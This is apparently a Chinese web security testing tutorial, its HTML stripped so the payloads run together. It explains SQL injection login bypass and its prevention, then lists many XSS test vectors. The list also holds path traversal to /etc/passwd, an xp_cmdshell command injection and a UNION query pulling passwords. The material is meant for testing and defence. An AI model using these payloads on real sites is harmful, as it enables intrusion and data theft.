如何进行WEB安全性测试

WEB的安全性测试主要从以下方面考虑：1.SQLInjection(SQL注入)(1)如何进行SQL注入测试?首先找到带有参数传递的URL页面,如搜索页面,登录页面,提交评论页面等等.注1:对于未明显标识在URL中传递参数的,可以通过查看HTML源代码中的FORM标签来辨别是否还有参数传递.在FORM和/FORM的标签中间的每一个参数传递都有可能被利用.formid=form_searchaction=/search/method=getdivinputtype=textname=qid=search_qvalue=/inputname=searchtype=imagesrc=/media/images/site/search_btn.gif/ahref=/search/class=flGamefinder/a/div/form注2:当你找不到有输入行为的页面时,可以尝试找一些带有某些参数的特殊的URL,如=10其次,在URL参数或表单中加入某些特殊的SQL语句或SQL片断,如在登录页面的URL中输入=HI'OR1=1--注1：根据实际情况,SQL注入请求可以使用以下语句:'or1=1--or1=1--or1=1--'or'a'='aora=a')or('a'='a注2：为什么是OR，以及',――是特殊的字符呢？例子：在登录时进行身份验证时，通常使用如下语句来进行验证：sql=select*fromuserwhereusername='username'andpwd='password'如输入=admin'or1='1&pwd=11，SQL语句会变成以下：sql=select*fromuserwhereusername='admin'or1='1'andpassword='11''与admin前面的'组成了一个查询条件,即username='admin',接下来的语句将按下一个查询条件来执行.接下来是OR查询条件,OR是一个逻辑运算符，在判断多个条件的时候，只要一个成立，则等式就成立，后面的AND就不再时行判断了，也就是说我们绕过了密码验证，我们只用用户名就可以登录.如输入=admin'--&pwd=11，SQL语句会变成以下sql=select*fromuserwherename='admin'--'andpasword='11','与admin前面的'组成了一个查询条件,即username='admin',接下来的语句将按下一个查询条件来执行接下来是--查询条件,“--”是忽略或注释,上述通过连接符注释掉后面的密码验证(注:对ACCESS数据库无效).最后,验证是否能入侵成功或是出错的信息是否包含关于数据库服务器的相关信息;如果能说明存在SQL安全漏洞.试想,如果网站存在SQL注入的危险,对于有经验的恶意用户还可能猜出数据库表和表结构,并对数据库表进行增\删\改的操作,这样造成的后果是非常严重的.(2)如何预防SQL注入?从应用程序的角度来讲,我们要做以下三项工作:转义敏感字符及字符串(SQL的敏感字符包括“exec”,”xp_”,”sp_”,”declare”,”Union”,”cmd”,”+”,”//”,”..”,”;”,”‘”,”--”,”%”,”0x”,”=!-*/()|”,和”空格”).屏蔽出错信息：阻止攻击者知道攻击的结果在服务端正式处理之前提交数据的合法性(合法性检查主要包括三项:数据类型,数据长度,敏感字符的校验)进行检查等。最根本的解决手段,在确认客户端的输入合法之前,服务端拒绝进行关键性的处理操作.从测试人员的角度来讲,在程序开发前(即需求阶段),我们就应该有意识的将安全性检查应用到需求测试中,例如对一个表单需求进行检查时,我们一般检验以下几项安全性问题:需求中应说明表单中某一FIELD的类型,长度,以及取值范围(主要作用就是禁止输入敏感字符)需求中应说明如果超出表单规定的类型,长度,以及取值范围的,应用程序应给出不包含任何代码或数据库信息的错误提示.当然在执行测试的过程中,我们也需求对上述两项内容进行测试.2.Cross-sitescritping(XSS):(跨站点脚本攻击)(1)如何进行XSS测试?!--[if!supportLists]--首先,找到带有参数传递的URL,如登录页面,搜索页面,提交评论,发表留言页面等等。!--[if!supportLists]--其次,在页面参数中输入如下语句(如:Javascrīpt,VBscrīpt,HTML,ActiveX,Flash)来进行测试：scrīptalert(document.cookie)/scrīpt注:其它的XSS测试语句scrīptalert(document.cookie)/scrīpt='scrīptalert(document.cookie)/scrīptscrīptalert(document.cookie)/scrīptscrīptalert(vulnerable)/scrīpt%3Cscrīpt%3Ealert('XSS')%3C/scrīpt%3Escrīptalert('XSS')/scrīptimgsrc=javascrīpt:alert('XSS')%0a%0ascrīptalert(\Vulnerable\)/scrīpt.jsp%22%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini%3c/a%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e%3c/title%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e/index.html%3f.jsp%3f.jsp<scrīpt>alert('Vulnerable');</scrīpt>scrīptalert('Vulnerable')/scrīpt?sql_debug=1a%5c.aspxa.jsp/scrīptalert('Vulnerable')/scrīpta/a?scrīptalert('Vulnerable')/scrīptscrīptalert('Vulnerable')/scrīpt';exec%20master..xp_cmdshell%20'dir%20c:%20%20c:\inetpub\īpt%3Ealert(document.cookie)%3C/scrīpt%3E%3Cscrīpt%3Ealert(document.domain);%3C/scrīpt%3E&%3Cscrīpt%3Ealert(document.domain);%3C/scrīpt%3E&SESSION_ID={SESSION_ID}&SESSION_ID=1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=../../../../../../../../etc/passwd..\..\..\..\..\..\..\..\windows\system.ini\..\..\..\..\..\..\..\..\windows\system.ini'';!--XSS=&{()}IMGSRC=javascrīpt:alert('XSS');IMGSRC=javascrīpt:alert('XSS')IMGSRC=javascrīpt:alert('XSS')IMGSRC=javascrīpt:alert("XSS")IMGSRC=javascrīpt:alert('XSS')IMGSRC=javascrīpt:alert('XSS')IMGSRC=javascript:alert('XSS')IMGSRC=javascrīpt:alert('XSS');IMGSRC=javascrīpt:alert('XSS');IMGSRC=javascrīpt:alert('XSS');IMGSRC=java\0scrīpt:alert(\XSS\);'outIMGSRC=javascrīpt:alert('XSS');scrīpta=/XSS/alert(a.source)/scrīptBODYBACKGROUND=javascrīpt:alert('XSS')BODYōNLOAD=alert('XSS')IMGDYNSRC=javascrīpt:alert('XSS')IMGLOWSRC=javascrīpt:alert('XSS')BGSOUNDSRC=javascrīpt:alert('XSS');brsize=&{alert('XSS')}LAYERSRC==stylesheetHREF=javascrīpt:alert('XSS');IMGSRC='vbscrīpt:msgbox(XSS)'IMGSRC=mocha:[code]IMGSRC=livescrīpt:[code]METAHTTP-EQUIV=refreshCONTENT=0;url=javascrīpt:alert('XSS');IFRAMESRC=javascrīpt:alert('XSS')/IFRAMEFRAMESETFRAMESRC=javascrīpt:alert('XSS')/FRAME/FRAMESETTABLEBACKGROUND=javascrīpt:alert('XSS')DIVSTYLE=background-image:url(javascrīpt:alert('XSS'))DIVSTYLE=behaviour:url(');DIVSTYLE=width:expression(alert('XSS'));STYLE@im\port'\ja\vasc\ript:alert(XSS)';/STYLEIMGSTYLE='xss:expre\ssion(alert(XSS))'STYLETYPE=text/javascrīptalert('XSS');/STYLESTYLETYPE=text/css.XSS{background-image:url(javascrīpt:alert('XSS'));}/STYLEACLASS=XSS/ASTYLEtype=text/cssBODY{background:url(javascrīpt:alert('XSS'))}